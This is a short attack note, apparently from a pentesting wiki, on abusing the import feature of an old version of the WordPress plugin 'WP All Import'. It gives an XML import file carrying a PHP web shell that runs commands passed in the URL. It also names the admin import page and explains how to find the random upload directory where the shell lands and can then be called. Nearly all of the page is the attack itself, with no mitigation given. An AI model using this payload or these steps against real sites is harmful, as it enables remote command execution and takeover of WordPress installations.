Import / Export Functionality Exploits
β οΈ The Risk
Old plugin "WP All Import"
Attack Scenario
<post> <title>Malicious Post</title> <content><![CDATA[<?php system($_GET['cmd']); ?>]]></content> </post>https://example.com//wp-admin/admin.php?page=pmxi-admin-import When the upload finishes you'll be able to find the random directory it was sent to by checking the links on the source code of the Managed Imports page: http://example.com/wp-admin/admin.php?page=pmxi-admin-manage The file will be located at something like: https://example.com/wp-content/uploads/wpallimport/uploads/f8ac124b335362e2faed2da06d2123d5/folder/filename.php
Last updated